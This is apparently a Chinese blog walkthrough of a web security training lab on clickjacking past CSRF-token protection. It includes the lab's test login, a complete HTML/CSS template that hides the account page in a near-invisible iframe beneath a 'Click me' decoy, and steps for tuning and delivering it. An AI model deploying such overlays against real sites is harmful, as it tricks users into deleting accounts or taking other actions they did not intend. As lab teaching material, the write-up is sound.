Lab: Basic clickjacking with CSRF token protection:使用CSRF令牌保护的基本点击劫持
作者:互联网
靶场内容:
该实验室包含登录功能和受CSRF 令牌保护的删除帐户按钮。用户将点击诱饵网站上显示“点击”一词的元素。
为了解决这个实验,制作一些 HTML 来构建帐户页面并欺骗用户删除他们的帐户。删除帐号后,实验室就解决了。
您可以使用以下凭据登录自己的帐户: wiener:peter
注意
受害者将使用 Chrome,因此请在该浏览器上测试您的漏洞利用。
靶场解决方法
- 说实话,这就是一个隐藏页面的点击劫持
- 主要是CSRF的token已经存在了,就恰好利用这个token进行一些非法操作
- 在目标网站上登录您的帐户。
- 转到漏洞利用服务器并将以下 HTML 模板粘贴到“Body”部分:
<style>
/iframe {
position:relative;
width:$width_value;
height: $height_value;
opacity: $opacity;
z-index: 2;
}
div {
position:absolute;
top:$top_value;
left:$side_value;
z-index: 1;
}
</style>
<div>Test me</div>
<iframe src="$url"></iframe>
- 对模板进行以下调整:
- 将$url属性中的内容替换为目标网站用户my-account页面的 URL。
- 为iframe的$height_value和$width_value变量替换合适的像素值(我们分别建议 700px 和 500px)。
- 为诱饵网页内容的$top_value和$side_value变量替换合适的像素值,以便“删除帐户”按钮和“测试我”诱饵动作对齐(我建议 480 像素和 60 像素)。
- 设置不透明度值 $opacity 以确保目标 iframe 是透明的。最初,使用 0.1 的不透明度,以便您可以对齐 iframe 操作并根据需要调整位置值。对于提交的攻击,值 0.0001 将起作用。
- 单击“存储”,然后单击“查看漏洞利用”。
- 将鼠标悬停在“Test me”上并确保光标变为手形,表明 div 元素已正确定位。不要自己实际单击“删除帐户”按钮。如果这样做,实验室将被破坏,您需要等到它重置后再试(大约 20 分钟)。如果 div 没有正确对齐,请调整样式表的top和left属性。
- 正确排列 div 元素后,将“Test me”更改为“Click me”,然后单击“Store”。
- 点击“向受害者提供漏洞利用”,实验室应该就解决了。(如果不能解决就调整参数)
标签:me,clickjacking,帐户,单击,top,value,Lab,CSRF,div 来源: https://www.cnblogs.com/Zeker62/p/15177343.html